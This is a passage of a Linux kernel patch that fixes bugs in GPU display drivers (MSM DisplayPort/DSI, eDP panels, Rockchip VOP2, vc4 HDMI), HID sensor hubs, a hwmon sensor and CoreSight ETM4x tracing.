+ 	ctl->ops.update_pending_flush_intf(ctl, phys_enc->intf_idx);
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index 84f9e3e5f9642..559809a5cbcfb 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -35,6 +35,7 @@ struct dp_aux_private {
+ 	bool no_send_stop;
+ 	bool initted;
+ 	bool is_edp;
++	bool enable_xfers;
+ 	u32 offset;
+ 	u32 segment;
+ 
+@@ -297,6 +298,17 @@ static ssize_t dp_aux_transfer(struct drm_dp_aux *dp_aux,
+ 		goto exit;
+ 	}
+ 
++	/*
++	 * If we're using DP and an external display isn't connected then the
++	 * transfer won't succeed. Return right away. If we don't do this we
++	 * can end up with long timeouts if someone tries to access the DP AUX
++	 * character device when no DP device is connected.
++	 */
++	if (!aux->is_edp && !aux->enable_xfers) {
++		ret = -ENXIO;
++		goto exit;
++	}
++
+ 	/*
+ 	 * For eDP it's important to give a reasonably long wait here for HPD
+ 	 * to be asserted. This is because the panel driver may have _just_
+@@ -368,14 +380,14 @@ static ssize_t dp_aux_transfer(struct drm_dp_aux *dp_aux,
+ 	return ret;
+ }
+ 
+-void dp_aux_isr(struct drm_dp_aux *dp_aux)
++irqreturn_t dp_aux_isr(struct drm_dp_aux *dp_aux)
+ {
+ 	u32 isr;
+ 	struct dp_aux_private *aux;
+ 
+ 	if (!dp_aux) {
+ 		DRM_ERROR("invalid input\n");
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	aux = container_of(dp_aux, struct dp_aux_private, dp_aux);
+@@ -384,11 +396,11 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 
+ 	/* no interrupts pending, return immediately */
+ 	if (!isr)
+-		return;
++		return IRQ_NONE;
+ 
+ 	if (!aux->cmd_busy) {
+ 		DRM_ERROR("Unexpected DP AUX IRQ %#010x when not busy\n", isr);
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	/*
+@@ -420,10 +432,20 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 		aux->aux_error_num = DP_AUX_ERR_NONE;
+ 	} else {
+ 		DRM_WARN("Unexpected interrupt: %#010x\n", isr);
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	complete(&aux->comp);
++
++	return IRQ_HANDLED;
++}
++
++void dp_aux_enable_xfers(struct drm_dp_aux *dp_aux, bool enabled)
++{
++	struct dp_aux_private *aux;
++
++	aux = container_of(dp_aux, struct dp_aux_private, dp_aux);
++	aux->enable_xfers = enabled;
+ }
+ 
+ void dp_aux_reconfig(struct drm_dp_aux *dp_aux)
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.h b/drivers/gpu/drm/msm/dp/dp_aux.h
+index e930974bcb5b9..f3052cb43306b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.h
++++ b/drivers/gpu/drm/msm/dp/dp_aux.h
+@@ -11,7 +11,8 @@
+ 
+ int dp_aux_register(struct drm_dp_aux *dp_aux);
+ void dp_aux_unregister(struct drm_dp_aux *dp_aux);
+-void dp_aux_isr(struct drm_dp_aux *dp_aux);
++irqreturn_t dp_aux_isr(struct drm_dp_aux *dp_aux);
++void dp_aux_enable_xfers(struct drm_dp_aux *dp_aux, bool enabled);
+ void dp_aux_init(struct drm_dp_aux *dp_aux);
+ void dp_aux_deinit(struct drm_dp_aux *dp_aux);
+ void dp_aux_reconfig(struct drm_dp_aux *dp_aux);
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index b20701893e5b3..bd1343602f553 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1014,14 +1014,14 @@ static int dp_ctrl_update_vx_px(struct dp_ctrl_private *ctrl)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (voltage_swing_level >= DP_TRAIN_VOLTAGE_SWING_MAX) {
++	if (voltage_swing_level >= DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(ctrl->drm_dev,
+ 				"max. voltage swing level reached %d\n",
+ 				voltage_swing_level);
+ 		max_level_reached |= DP_TRAIN_MAX_SWING_REACHED;
+ 	}
+ 
+-	if (pre_emphasis_level >= DP_TRAIN_PRE_EMPHASIS_MAX) {
++	if (pre_emphasis_level >= DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(ctrl->drm_dev,
+ 				"max. pre-emphasis level reached %d\n",
+ 				pre_emphasis_level);
+@@ -1112,7 +1112,7 @@ static int dp_ctrl_link_train_1(struct dp_ctrl_private *ctrl,
+ 		}
+ 
+ 		if (ctrl->link->phy_params.v_level >=
+-			DP_TRAIN_VOLTAGE_SWING_MAX) {
++			DP_TRAIN_LEVEL_MAX) {
+ 			DRM_ERROR_RATELIMITED("max v_level reached\n");
+ 			return -EAGAIN;
+ 		}
+@@ -1973,27 +1973,33 @@ int dp_ctrl_off(struct dp_ctrl *dp_ctrl)
+ 	return ret;
+ }
+ 
+-void dp_ctrl_isr(struct dp_ctrl *dp_ctrl)
++irqreturn_t dp_ctrl_isr(struct dp_ctrl *dp_ctrl)
+ {
+ 	struct dp_ctrl_private *ctrl;
+ 	u32 isr;
++	irqreturn_t ret = IRQ_NONE;
+ 
+ 	if (!dp_ctrl)
+-		return;
++		return IRQ_NONE;
+ 
+ 	ctrl = container_of(dp_ctrl, struct dp_ctrl_private, dp_ctrl);
+ 
+ 	isr = dp_catalog_ctrl_get_interrupt(ctrl->catalog);
+ 
++
+ 	if (isr & DP_CTRL_INTR_READY_FOR_VIDEO) {
+ 		drm_dbg_dp(ctrl->drm_dev, "dp_video_ready\n");
+ 		complete(&ctrl->video_comp);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (isr & DP_CTRL_INTR_IDLE_PATTERN_SENT) {
+ 		drm_dbg_dp(ctrl->drm_dev, "idle_patterns_sent\n");
+ 		complete(&ctrl->idle_comp);
++		ret = IRQ_HANDLED;
+ 	}
++
++	return ret;
+ }
+ 
+ struct dp_ctrl *dp_ctrl_get(struct device *dev, struct dp_link *link,
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.h b/drivers/gpu/drm/msm/dp/dp_ctrl.h
+index 9f29734af81ca..c3af06dc87b17 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.h
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.h
+@@ -25,7 +25,7 @@ int dp_ctrl_off_link_stream(struct dp_ctrl *dp_ctrl);
+ int dp_ctrl_off_link(struct dp_ctrl *dp_ctrl);
+ int dp_ctrl_off(struct dp_ctrl *dp_ctrl);
+ void dp_ctrl_push_idle(struct dp_ctrl *dp_ctrl);
+-void dp_ctrl_isr(struct dp_ctrl *dp_ctrl);
++irqreturn_t dp_ctrl_isr(struct dp_ctrl *dp_ctrl);
+ void dp_ctrl_handle_sink_request(struct dp_ctrl *dp_ctrl);
+ struct dp_ctrl *dp_ctrl_get(struct device *dev, struct dp_link *link,
+ 			struct dp_panel *panel,	struct drm_dp_aux *aux,
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index d16c12351adb6..fd82752e502f1 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -577,6 +577,8 @@ static int dp_hpd_plug_handle(struct dp_display_private *dp, u32 data)
+ 	if (!hpd)
+ 		return 0;
+ 
++	dp_aux_enable_xfers(dp->aux, true);
++
+ 	mutex_lock(&dp->event_mutex);
+ 
+ 	state =  dp->hpd_state;
+@@ -641,6 +643,8 @@ static int dp_hpd_unplug_handle(struct dp_display_private *dp, u32 data)
+ 	if (!hpd)
+ 		return 0;
+ 
++	dp_aux_enable_xfers(dp->aux, false);
++
+ 	mutex_lock(&dp->event_mutex);
+ 
+ 	state = dp->hpd_state;
+@@ -1193,7 +1197,7 @@ static int dp_hpd_event_thread_start(struct dp_display_private *dp_priv)
+ static irqreturn_t dp_display_irq_handler(int irq, void *dev_id)
+ {
+ 	struct dp_display_private *dp = dev_id;
+-	irqreturn_t ret = IRQ_HANDLED;
++	irqreturn_t ret = IRQ_NONE;
+ 	u32 hpd_isr_status;
+ 
+ 	if (!dp) {
+@@ -1221,13 +1225,15 @@ static irqreturn_t dp_display_irq_handler(int irq, void *dev_id)
+ 
+ 		if (hpd_isr_status & DP_DP_HPD_UNPLUG_INT_MASK)
+ 			dp_add_event(dp, EV_HPD_UNPLUG_INT, 0, 0);
++
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/* DP controller isr */
+-	dp_ctrl_isr(dp->ctrl);
++	ret |= dp_ctrl_isr(dp->ctrl);
+ 
+ 	/* DP aux isr */
+-	dp_aux_isr(dp->aux);
++	ret |= dp_aux_isr(dp->aux);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index ceb382fa56d5b..e4f9decec970f 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -1102,6 +1102,7 @@ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ int dp_link_adjust_levels(struct dp_link *dp_link, u8 *link_status)
+ {
+ 	int i;
++	u8 max_p_level;
+ 	int v_max = 0, p_max = 0;
+ 	struct dp_link_private *link;
+ 
+@@ -1133,30 +1134,29 @@ int dp_link_adjust_levels(struct dp_link *dp_link, u8 *link_status)
+ 	 * Adjust the voltage swing and pre-emphasis level combination to within
+ 	 * the allowable range.
+ 	 */
+-	if (dp_link->phy_params.v_level > DP_TRAIN_VOLTAGE_SWING_MAX) {
++	if (dp_link->phy_params.v_level > DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested vSwingLevel=%d, change to %d\n",
+ 			dp_link->phy_params.v_level,
+-			DP_TRAIN_VOLTAGE_SWING_MAX);
+-		dp_link->phy_params.v_level = DP_TRAIN_VOLTAGE_SWING_MAX;
++			DP_TRAIN_LEVEL_MAX);
++		dp_link->phy_params.v_level = DP_TRAIN_LEVEL_MAX;
+ 	}
+ 
+-	if (dp_link->phy_params.p_level > DP_TRAIN_PRE_EMPHASIS_MAX) {
++	if (dp_link->phy_params.p_level > DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested preEmphasisLevel=%d, change to %d\n",
+ 			dp_link->phy_params.p_level,
+-			DP_TRAIN_PRE_EMPHASIS_MAX);
+-		dp_link->phy_params.p_level = DP_TRAIN_PRE_EMPHASIS_MAX;
++			DP_TRAIN_LEVEL_MAX);
++		dp_link->phy_params.p_level = DP_TRAIN_LEVEL_MAX;
+ 	}
+ 
+-	if ((dp_link->phy_params.p_level > DP_TRAIN_PRE_EMPHASIS_LVL_1)
+-		&& (dp_link->phy_params.v_level ==
+-			DP_TRAIN_VOLTAGE_SWING_LVL_2)) {
++	max_p_level = DP_TRAIN_LEVEL_MAX - dp_link->phy_params.v_level;
++	if (dp_link->phy_params.p_level > max_p_level) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested preEmphasisLevel=%d, change to %d\n",
+ 			dp_link->phy_params.p_level,
+-			DP_TRAIN_PRE_EMPHASIS_LVL_1);
+-		dp_link->phy_params.p_level = DP_TRAIN_PRE_EMPHASIS_LVL_1;
++			max_p_level);
++		dp_link->phy_params.p_level = max_p_level;
+ 	}
+ 
+ 	drm_dbg_dp(link->drm_dev, "adjusted: v_level=%d, p_level=%d\n",
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.h b/drivers/gpu/drm/msm/dp/dp_link.h
+index 9dd4dd9265304..79c3a02b8dacd 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.h
++++ b/drivers/gpu/drm/msm/dp/dp_link.h
+@@ -19,19 +19,7 @@ struct dp_link_info {
+ 	unsigned long capabilities;
+ };
+ 
+-enum dp_link_voltage_level {
+-	DP_TRAIN_VOLTAGE_SWING_LVL_0	= 0,
+-	DP_TRAIN_VOLTAGE_SWING_LVL_1	= 1,
+-	DP_TRAIN_VOLTAGE_SWING_LVL_2	= 2,
+-	DP_TRAIN_VOLTAGE_SWING_MAX	= DP_TRAIN_VOLTAGE_SWING_LVL_2,
+-};
+-
+-enum dp_link_preemaphasis_level {
+-	DP_TRAIN_PRE_EMPHASIS_LVL_0	= 0,
+-	DP_TRAIN_PRE_EMPHASIS_LVL_1	= 1,
+-	DP_TRAIN_PRE_EMPHASIS_LVL_2	= 2,
+-	DP_TRAIN_PRE_EMPHASIS_MAX	= DP_TRAIN_PRE_EMPHASIS_LVL_2,
+-};
++#define DP_TRAIN_LEVEL_MAX	3
+ 
+ struct dp_link_test_video {
+ 	u32 test_video_pattern;
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index a7c6e8a1754de..cd9ca36901611 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -402,8 +402,8 @@ int dsi_link_clk_set_rate_6g(struct msm_dsi_host *msm_host)
+ 	unsigned long byte_intf_rate;
+ 	int ret;
+ 
+-	DBG("Set clk rates: pclk=%d, byteclk=%lu",
+-		msm_host->mode->clock, msm_host->byte_clk_rate);
++	DBG("Set clk rates: pclk=%lu, byteclk=%lu",
++	    msm_host->pixel_clk_rate, msm_host->byte_clk_rate);
+ 
+ 	ret = dev_pm_opp_set_rate(&msm_host->pdev->dev,
+ 				  msm_host->byte_clk_rate);
+@@ -482,9 +482,9 @@ int dsi_link_clk_set_rate_v2(struct msm_dsi_host *msm_host)
+ {
+ 	int ret;
+ 
+-	DBG("Set clk rates: pclk=%d, byteclk=%lu, esc_clk=%lu, dsi_src_clk=%lu",
+-		msm_host->mode->clock, msm_host->byte_clk_rate,
+-		msm_host->esc_clk_rate, msm_host->src_clk_rate);
++	DBG("Set clk rates: pclk=%lu, byteclk=%lu, esc_clk=%lu, dsi_src_clk=%lu",
++	    msm_host->pixel_clk_rate, msm_host->byte_clk_rate,
++	    msm_host->esc_clk_rate, msm_host->src_clk_rate);
+ 
+ 	ret = clk_set_rate(msm_host->byte_clk, msm_host->byte_clk_rate);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_drv.c b/drivers/gpu/drm/mxsfb/lcdif_drv.c
+index 075002ed6fb09..43d316447f387 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_drv.c
++++ b/drivers/gpu/drm/mxsfb/lcdif_drv.c
+@@ -290,6 +290,9 @@ static int __maybe_unused lcdif_suspend(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
++	if (pm_runtime_suspended(dev))
++		return 0;
++
+ 	return lcdif_rpm_suspend(dev);
+ }
+ 
+@@ -297,7 +300,8 @@ static int __maybe_unused lcdif_resume(struct device *dev)
+ {
+ 	struct drm_device *drm = dev_get_drvdata(dev);
+ 
+-	lcdif_rpm_resume(dev);
++	if (!pm_runtime_suspended(dev))
++		lcdif_rpm_resume(dev);
+ 
+ 	return drm_mode_config_helper_resume(drm);
+ }
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index bfcddd4aa9322..2c14779a39e88 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -397,6 +397,7 @@ static int panel_edp_suspend(struct device *dev)
+ {
+ 	struct panel_edp *p = dev_get_drvdata(dev);
+ 
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	gpiod_set_value_cansleep(p->enable_gpio, 0);
+ 	regulator_disable(p->supply);
+ 	p->unprepared_time = ktime_get();
+@@ -453,6 +454,7 @@ static int panel_edp_prepare_once(struct panel_edp *p)
+ 	}
+ 
+ 	gpiod_set_value_cansleep(p->enable_gpio, 1);
++	drm_dp_dpcd_set_powered(p->aux, true);
+ 
+ 	delay = p->desc->delay.hpd_reliable;
+ 	if (p->no_hpd)
+@@ -489,6 +491,7 @@ static int panel_edp_prepare_once(struct panel_edp *p)
+ 	return 0;
+ 
+ error:
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	gpiod_set_value_cansleep(p->enable_gpio, 0);
+ 	regulator_disable(p->supply);
+ 	p->unprepared_time = ktime_get();
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 5d04957b1144f..ec2780be74d10 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -573,10 +573,8 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		}
+ 		dsi_r_host = of_find_mipi_dsi_host_by_node(dsi_r);
+ 		of_node_put(dsi_r);
+-		if (!dsi_r_host) {
+-			dev_err(dev, "Cannot get secondary DSI host\n");
+-			return -EPROBE_DEFER;
+-		}
++		if (!dsi_r_host)
++			return dev_err_probe(dev, -EPROBE_DEFER, "Cannot get secondary DSI host\n");
+ 
+ 		nt->dsi[1] = mipi_dsi_device_register_full(dsi_r_host, info);
+ 		if (!nt->dsi[1]) {
+diff --git a/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c b/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
+index 5a8b978c64158..5b698514957cf 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
++++ b/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
+@@ -53,7 +53,7 @@ static void atana33xc20_wait(ktime_t start_ktime, unsigned int min_ms)
+ 	ktime_t now_ktime, min_ktime;
+ 
+ 	min_ktime = ktime_add(start_ktime, ms_to_ktime(min_ms));
+-	now_ktime = ktime_get();
++	now_ktime = ktime_get_boottime();
+ 
+ 	if (ktime_before(now_ktime, min_ktime))
+ 		msleep(ktime_to_ms(ktime_sub(min_ktime, now_ktime)) + 1);
+@@ -72,10 +72,11 @@ static int atana33xc20_suspend(struct device *dev)
+ 	if (p->el3_was_on)
+ 		atana33xc20_wait(p->el_on3_off_time, 150);
+ 
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	ret = regulator_disable(p->supply);
+ 	if (ret)
+ 		return ret;
+-	p->powered_off_time = ktime_get();
++	p->powered_off_time = ktime_get_boottime();
+ 	p->el3_was_on = false;
+ 
+ 	return 0;
+@@ -93,7 +94,8 @@ static int atana33xc20_resume(struct device *dev)
+ 	ret = regulator_enable(p->supply);
+ 	if (ret)
+ 		return ret;
+-	p->powered_on_time = ktime_get();
++	drm_dp_dpcd_set_powered(p->aux, true);
++	p->powered_on_time = ktime_get_boottime();
+ 
+ 	if (p->no_hpd) {
+ 		msleep(HPD_MAX_MS);
+@@ -107,19 +109,17 @@ static int atana33xc20_resume(struct device *dev)
+ 		if (hpd_asserted < 0)
+ 			ret = hpd_asserted;
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(dev, "Error waiting for HPD GPIO: %d\n", ret);
+-
+-		return ret;
+-	}
+-
+-	if (p->aux->wait_hpd_asserted) {
++			goto error;
++		}
++	} else if (p->aux->wait_hpd_asserted) {
+ 		ret = p->aux->wait_hpd_asserted(p->aux, HPD_MAX_US);
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(dev, "Controller error waiting for HPD: %d\n", ret);
+-
+-		return ret;
++			goto error;
++		}
+ 	}
+ 
+ 	/*
+@@ -131,6 +131,12 @@ static int atana33xc20_resume(struct device *dev)
+ 	 * right times.
+ 	 */
+ 	return 0;
++
++error:
++	drm_dp_dpcd_set_powered(p->aux, false);
++	regulator_disable(p->supply);
++
++	return ret;
+ }
+ 
+ static int atana33xc20_disable(struct drm_panel *panel)
+@@ -142,7 +148,7 @@ static int atana33xc20_disable(struct drm_panel *panel)
+ 		return 0;
+ 
+ 	gpiod_set_value_cansleep(p->el_on3_gpio, 0);
+-	p->el_on3_off_time = ktime_get();
++	p->el_on3_off_time = ktime_get_boottime();
+ 	p->enabled = false;
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index b714ee1bcbaa3..acb7f5c206d13 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2286,6 +2286,9 @@ static const struct panel_desc innolux_g121x1_l03 = {
+ 		.unprepare = 200,
+ 		.disable = 400,
+ 	},
++	.bus_format = MEDIA_BUS_FMT_RGB666_1X7X3_SPWG,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
++	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+ static const struct drm_display_mode innolux_n156bge_l21_mode = {
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index b233f52675dc4..a72642bb9cc60 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -607,6 +607,8 @@ static void vop2_setup_scale(struct vop2 *vop2, const struct vop2_win *win,
+ 	const struct drm_format_info *info;
+ 	u16 hor_scl_mode, ver_scl_mode;
+ 	u16 hscl_filter_mode, vscl_filter_mode;
++	uint16_t cbcr_src_w = src_w;
++	uint16_t cbcr_src_h = src_h;
+ 	u8 gt2 = 0;
+ 	u8 gt4 = 0;
+ 	u32 val;
+@@ -664,27 +666,27 @@ static void vop2_setup_scale(struct vop2 *vop2, const struct vop2_win *win,
+ 	vop2_win_write(win, VOP2_WIN_YRGB_VSCL_FILTER_MODE, vscl_filter_mode);
+ 
+ 	if (info->is_yuv) {
+-		src_w /= info->hsub;
+-		src_h /= info->vsub;
++		cbcr_src_w /= info->hsub;
++		cbcr_src_h /= info->vsub;
+ 
+ 		gt4 = 0;
+ 		gt2 = 0;
+ 
+-		if (src_h >= (4 * dst_h)) {
++		if (cbcr_src_h >= (4 * dst_h)) {
+ 			gt4 = 1;
+-			src_h >>= 2;
+-		} else if (src_h >= (2 * dst_h)) {
++			cbcr_src_h >>= 2;
++		} else if (cbcr_src_h >= (2 * dst_h)) {
+ 			gt2 = 1;
+-			src_h >>= 1;
++			cbcr_src_h >>= 1;
+ 		}
+ 
+-		hor_scl_mode = scl_get_scl_mode(src_w, dst_w);
+-		ver_scl_mode = scl_get_scl_mode(src_h, dst_h);
++		hor_scl_mode = scl_get_scl_mode(cbcr_src_w, dst_w);
++		ver_scl_mode = scl_get_scl_mode(cbcr_src_h, dst_h);
+ 
+-		val = vop2_scale_factor(src_w, dst_w);
++		val = vop2_scale_factor(cbcr_src_w, dst_w);
+ 		vop2_win_write(win, VOP2_WIN_SCALE_CBCR_X, val);
+ 
+-		val = vop2_scale_factor(src_h, dst_h);
++		val = vop2_scale_factor(cbcr_src_h, dst_h);
+ 		vop2_win_write(win, VOP2_WIN_SCALE_CBCR_Y, val);
+ 
+ 		vop2_win_write(win, VOP2_WIN_VSD_CBCR_GT4, gt4);
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index f696818913499..072e2487b4655 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -2489,6 +2489,8 @@ static int vc4_hdmi_audio_init(struct vc4_hdmi *vc4_hdmi)
+ 		index = 1;
+ 
+ 	addr = of_get_address(dev->of_node, index, NULL, NULL);
++	if (!addr)
++		return -EINVAL;
+ 
+ 	vc4_hdmi->audio.dma_data.addr = be32_to_cpup(addr) + mai_data->offset;
+ 	vc4_hdmi->audio.dma_data.addr_width = DMA_SLAVE_BUSWIDTH_4_BYTES;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index bb8bd7892b674..eda888f75f165 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -222,6 +222,11 @@ static void amd_sfh_resume(struct amd_mp2_dev *mp2)
+ 	struct amd_mp2_sensor_info info;
+ 	int i, status;
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		amd_sfh_clear_intr(mp2);
++		return;
++	}
++
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 		if (cl_data->sensor_sts[i] == SENSOR_DISABLED) {
+ 			info.sensor_idx = cl_data->sensor_idx[i];
+@@ -247,6 +252,11 @@ static void amd_sfh_suspend(struct amd_mp2_dev *mp2)
+ 	struct amdtp_cl_data *cl_data = mp2->cl_data;
+ 	int i, status;
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		amd_sfh_clear_intr(mp2);
++		return;
++	}
++
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 		if (cl_data->sensor_idx[i] != HPD_IDX &&
+ 		    cl_data->sensor_sts[i] == SENSOR_ENABLED) {
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 710fda5f19e1c..916d427163ca2 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -216,6 +216,11 @@ static int ish_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/* request and enable interrupt */
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
++	if (ret < 0) {
++		dev_err(dev, "ISH: Failed to allocate IRQ vectors\n");
++		return ret;
++	}
++
+ 	if (!pdev->msi_enabled && !pdev->msix_enabled)
+ 		irq_flag = IRQF_SHARED;
+ 
+diff --git a/drivers/hwmon/shtc1.c b/drivers/hwmon/shtc1.c
+index 18546ebc8e9f7..0365643029aee 100644
+--- a/drivers/hwmon/shtc1.c
++++ b/drivers/hwmon/shtc1.c
+@@ -238,7 +238,7 @@ static int shtc1_probe(struct i2c_client *client)
+ 
+ 	if (np) {
+ 		data->setup.blocking_io = of_property_read_bool(np, "sensirion,blocking-io");
+-		data->setup.high_precision = !of_property_read_bool(np, "sensicon,low-precision");
++		data->setup.high_precision = !of_property_read_bool(np, "sensirion,low-precision");
+ 	} else {
+ 		if (client->dev.platform_data)
+ 			data->setup = *(struct shtc1_platform_data *)dev->platform_data;
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index fda48a0afc1a5..354267edcb45f 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -1120,6 +1120,8 @@ static void etm4_init_arch_data(void *info)
+ 	drvdata->nr_event = FIELD_GET(TRCIDR0_NUMEVENT_MASK, etmidr0);
+ 	/* QSUPP, bits[16:15] Q element support field */
+ 	drvdata->q_support = FIELD_GET(TRCIDR0_QSUPP_MASK, etmidr0);
++	if (drvdata->q_support)
++		drvdata->q_filt = !!(etmidr0 & TRCIDR0_QFILT);
+ 	/* TSSIZE, bits[28:24] Global timestamp size field */
+ 	drvdata->ts_size = FIELD_GET(TRCIDR0_TSSIZE_MASK, etmidr0);
+ 
+@@ -1615,16 +1617,14 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	state->trcccctlr = etm4x_read32(csa, TRCCCCTLR);
+ 	state->trcbbctlr = etm4x_read32(csa, TRCBBCTLR);
+ 	state->trctraceidr = etm4x_read32(csa, TRCTRACEIDR);
+-	state->trcqctlr = etm4x_read32(csa, TRCQCTLR);
++	if (drvdata->q_filt)
++		state->trcqctlr = etm4x_read32(csa, TRCQCTLR);
+ 
+ 	state->trcvictlr = etm4x_read32(csa, TRCVICTLR);
+ 	state->trcviiectlr = etm4x_read32(csa, TRCVIIECTLR);
+ 	state->trcvissctlr = etm4x_read32(csa, TRCVISSCTLR);
+ 	if (drvdata->nr_pe_cmp)
+ 		state->trcvipcssctlr = etm4x_read32(csa, TRCVIPCSSCTLR);
+-	state->trcvdctlr = etm4x_read32(csa, TRCVDCTLR);
+-	state->trcvdsacctlr = etm4x_read32(csa, TRCVDSACCTLR);
+-	state->trcvdarcctlr = etm4x_read32(csa, TRCVDARCCTLR);
+ 
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+@@ -1641,7 +1641,8 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 		state->trccntvr[i] = etm4x_read32(csa, TRCCNTVRn(i));
+ 	}
+ 
+-	for (i = 0; i < drvdata->nr_resource * 2; i++)
++	/* Resource selector pair 0 is reserved */
++	for (i = 2; i < drvdata->nr_resource * 2; i++)
+ 		state->trcrsctlr[i] = etm4x_read32(csa, TRCRSCTLRn(i));
+ 
+ 	for (i = 0; i < drvdata->nr_ss_cmp; i++) {
+@@ -1726,8 +1727,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ {
+ 	int i;
+ 	struct etmv4_save_state *state = drvdata->save_state;
+-	struct csdev_access tmp_csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+-	struct csdev_access *csa = &tmp_csa;
++	struct csdev_access *csa = &drvdata->csdev->access;
++
